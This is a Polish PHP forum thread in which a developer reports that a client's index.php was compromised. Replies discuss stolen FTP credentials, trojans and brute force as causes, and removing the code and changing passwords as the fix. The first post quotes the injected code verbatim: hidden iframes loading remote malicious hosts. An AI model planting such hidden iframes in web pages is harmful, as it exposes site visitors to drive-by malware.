Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> Exploit czy co?
axwell
post
Post #1





Grupa: Zarejestrowani
Postów: 143
Pomógł: 1
Dołączył: 14.11.2007

Ostrzeżenie: (10%)
X----


Znajomy poprosił mnie o pewne przeróbki na stronie jego firmy. Zrobiłem wszystko jak należy, a następnie zakutalizowałem pliki. Oczywiście sprawdzałem czy wszytsko chodzi tak jak powinno. Nie było żadnego problemu. Dziś dzwoni do mnie i mówi że strona nie działa - wywala błąd php w składni w "index.php". Najdziwniejsze jest to, że pliku index.php w ogóle nigdy nie modyfikowałem. Zaglądam do kodu patrze a tu na końcu linijka:

  1. <iframe src="http://nonfatcarbest.cn/ts/in.cgi?mozila16" width=2 height=4 style="visibility: hidden"></iframe>


i jescze w innym miejscu coś takiego:
  1. <?php
  2. echo "<iframe src=\"http://nakulpi.net/?click=C42244\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
  3. ?>


Skąd to mogło się wziąć? I jak zapobiec żeby znowu nie "wlazło" ?
Go to the top of the page
+Quote Post
Spawnm
post
Post #2





Grupa: Moderatorzy
Postów: 4 069
Pomógł: 497
Dołączył: 11.05.2007
Skąd: Warszawa




było o tym kilka razy , wywal to i zmień hasło do ftp
Go to the top of the page
+Quote Post
axwell
post
Post #3





Grupa: Zarejestrowani
Postów: 143
Pomógł: 1
Dołączył: 14.11.2007

Ostrzeżenie: (10%)
X----


Przeszukałem forum i nie mogę znaleźć. Może jednak ktoś byłby tak miły i podzielił się wiedzą?
Go to the top of the page
+Quote Post
Spawnm
post
Post #4





Grupa: Moderatorzy
Postów: 4 069
Pomógł: 497
Dołączył: 11.05.2007
Skąd: Warszawa




przecież powiedziałem , wywalasz frame z indexów i zmieniasz hasło na ftp (IMG:http://forum.php.pl/style_emoticons/default/rolleyes.gif)
Go to the top of the page
+Quote Post
axwell
post
Post #5





Grupa: Zarejestrowani
Postów: 143
Pomógł: 1
Dołączył: 14.11.2007

Ostrzeżenie: (10%)
X----


To zrobiłem w pierwszej kolejnosći. Ale proszę o odp na pytanie:

Cytat(axwell @ 7.05.2009, 18:45:32 ) *
Skąd to mogło się wziąć?
Go to the top of the page
+Quote Post
kwiateusz
post
Post #6


Admin Techniczny


Grupa: Administratorzy
Postów: 2 071
Pomógł: 93
Dołączył: 5.07.2005
Skąd: Olsztyn




z komputera tego osobnika co mial haslo do ftp zwyczajny wirus/keylogger etc skopiowal haslo ftp. polaczyl sie i w index.php pododawal takie cuda
Go to the top of the page
+Quote Post
Shadowsword
post
Post #7





Grupa: Zarejestrowani
Postów: 149
Pomógł: 5
Dołączył: 9.04.2008
Skąd: W-WA

Ostrzeżenie: (0%)
-----


W niedziele miałem takiego exploita u siebie. Firma hostingowa stwierdziła, że włamali się za pomocą brute-forca (podstawianie znaków). W internecie znalazłem też informacje, że jeżeli masz folder tmp na serwerze i CHMOD 711 to jest na to jakiś exploit (nie wiem, czy to prawda) i trzecia możliwość ściągnąłeś trojana i on pobrał hasła z zapamiętanych w kliencie ftp lub zapisując to co wpisywałeś podczas logowania.
Go to the top of the page
+Quote Post
Kocurro
post
Post #8





Grupa: Zarejestrowani
Postów: 461
Pomógł: 32
Dołączył: 17.09.2003
Skąd: Łódź

Ostrzeżenie: (0%)
-----


Jak masz gównianie skonfigurowany serwer to nawet exploita nie potrzebujesz a jak masz dobrze skonfigurowany to nawet exploit nie pomoże.
Go to the top of the page
+Quote Post
Poker
post
Post #9





Grupa: Zarejestrowani
Postów: 205
Pomógł: 3
Dołączył: 20.04.2009
Skąd: Jaworzno

Ostrzeżenie: (0%)
-----


Pewnie używasz Total Commandera do połączeń z ftp (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

W dodatku po wejściu na taką stronę AVAST ostrzega o tym że znajduję na niej ROBAK.


Miałem identyczny problem usunąłem ze wszystkich plików index.php / .html te IFRAME'y zmieniłem hasło na FTP i teraz działa bez problemu. Oczywiście nie używam juz Total'a
Go to the top of the page
+Quote Post
PawelC
post
Post #10





Grupa: Zarejestrowani
Postów: 1 173
Pomógł: 121
Dołączył: 24.09.2007
Skąd: Toruń

Ostrzeżenie: (0%)
-----


Pisałem już co i jak: http://forum.php.pl/index.php?s=&showt...st&p=598818
Czasami wystarczy skorzystać z szukajki...

Ten post edytował ExPlOiT 8.05.2009, 13:06:56
Go to the top of the page
+Quote Post
zwierzołak
post
Post #11





Grupa: Zarejestrowani
Postów: 78
Pomógł: 1
Dołączył: 25.03.2008

Ostrzeżenie: (0%)
-----


Cytat
W niedziele miałem takiego exploita u siebie. Firma hostingowa stwierdziła, że włamali się za pomocą brute-forca (podstawianie znaków).

to mi się wydaje dosyć dziwne, chyba trudno nie zauważyć, że na jakieś konto ftp jest 10000 nieudanych prób zalogowania w krótkim czasie? to chyba źle świadczy o poziomie bezpieczeństwa hostingu jeśli pozwala na taki atak... co innego atakować np zahasłowane archiwum .rar na swoim komputerze

tak mi się wydaje, bo nie znam się na tym zbytnio - jestem ciekawy co sądzą specjaliści od bezpieczeństwa (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)
Go to the top of the page
+Quote Post
Shadowsword
post
Post #12





Grupa: Zarejestrowani
Postów: 149
Pomógł: 5
Dołączył: 9.04.2008
Skąd: W-WA

Ostrzeżenie: (0%)
-----


Też nie sądze, że to był brute force, ale tak mi napisali w wiadomości. Chociaż jeżeli np. mają dobrego botneta i jakoś rozłożyli atak np. na pół roku to możliwe. 
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 29.08.2025 - 06:01